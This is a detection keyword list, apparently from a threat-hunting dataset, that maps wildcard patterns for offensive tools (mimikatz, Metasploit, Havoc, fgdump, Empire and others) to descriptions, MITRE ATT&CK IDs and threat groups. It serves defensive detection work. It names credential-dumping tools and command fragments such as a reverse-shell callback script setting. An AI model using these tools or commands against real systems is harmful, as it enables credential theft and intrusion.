+"*ServerScan_Air_*_amd64*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Air_*_i386*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan_air-probes.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan_amd64.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Pro_*.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Pro_*_amd64*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*ServerScan_Pro_*_i386*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan64 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan64 *tcp*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*serverscan86 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" 
+"*Server-Side-Request-Forgery-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*service/executable/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*service/executable/compile.exe*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*service::me*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::preshutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::remove*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::shutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service_permissions_escalate.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ServiceHavoc.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*servicemove*hid.dll*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*servpw.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*servpw64.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SessionGopher*","offensive_tool_keyword","SessionGopher","SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems. jump boxes. 
or point-of-sale terminals.","T1081 - T1087 - T1119","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","1095","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z" +"*SessionGopher.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*set * virus_scanner*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*set AutoRunScript multi_console_command -rc /root/*.rc*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*set CertPath data/*","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 